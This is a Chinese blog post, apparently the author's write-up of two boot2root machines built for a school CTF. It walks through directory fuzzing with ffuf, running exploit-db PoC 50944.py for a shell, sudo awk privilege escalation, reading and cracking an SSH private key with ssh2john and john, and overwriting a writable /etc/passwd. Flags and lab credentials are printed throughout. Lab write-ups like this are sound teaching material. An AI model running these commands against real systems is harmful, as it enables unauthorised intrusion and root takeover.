whiterei
密码是5L2g5oiR54q55aaC6ZqU6ZWc6KeG54mp
嗯抄doubletrouble
扫目录 /secret 里面有个图片
然后根据在RAEDME.txt里的提示有两种方法,要么 stegsolve 看LSB隐写拿到账密,要么看出来这是github的头像设置,然后去github搜相关用户名,在提交的历史记录中拿到账密(以及poc,但认不认得出来就是另一回事了)。这里换了张难度低一点的图
根据exploitdb里面找到这个版本的qpdm的poc:50944.py,然后
python 50944.py -url http://192.168.56.101/ -u noone@2501.prj -p noone123456
拿shellshell: flag{nICe!TRyhardErTOgETrooT}
sudo -l直接出是awk提权:
sudo awk 'BEGIN {system("/bin/sh")}'
root: flag{ayanamireiwakawaiiyo}
blackrei
5omA6KeB5peg6Z2e6Jma5bm76L+35r+b
嗯抄evilbox
扫出来secret/目录,FUZZ出evil.php。
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.56.113/secret/FUZZ.php
根据提示继续FUZZ参数名
command
,或者你嗯猜是'rei', 'Rei', 'Ayanami', 'ayanami', 'blackRei'
都对主页的提示应该能指向这会要去试着ssh链接,即读
/home/Ayanami/.ssh/id_rsa
但文件加密了,先用
ssh2john
提取hash
值,再拿john
爆破出密码ANGEL LOVE
1
2
3ssh2john id_rsa > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
ssh Ayanami@192.168.56.120 -i id_rsashell: flag{GOoDJoB!bUtNomOReHinttHisTiMe^^}
/etc/passwd
可以更改,openssl passwd -1
生成密码的md5
替换掉root的密码即可root: flag{YOUDidIT!cONGRATULatiONsfORtHat}
noone的校赛出题
- 本文链接: http://noone40404.github.io/2025/03/20/noone的校赛出题/
- 版权声明: 本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!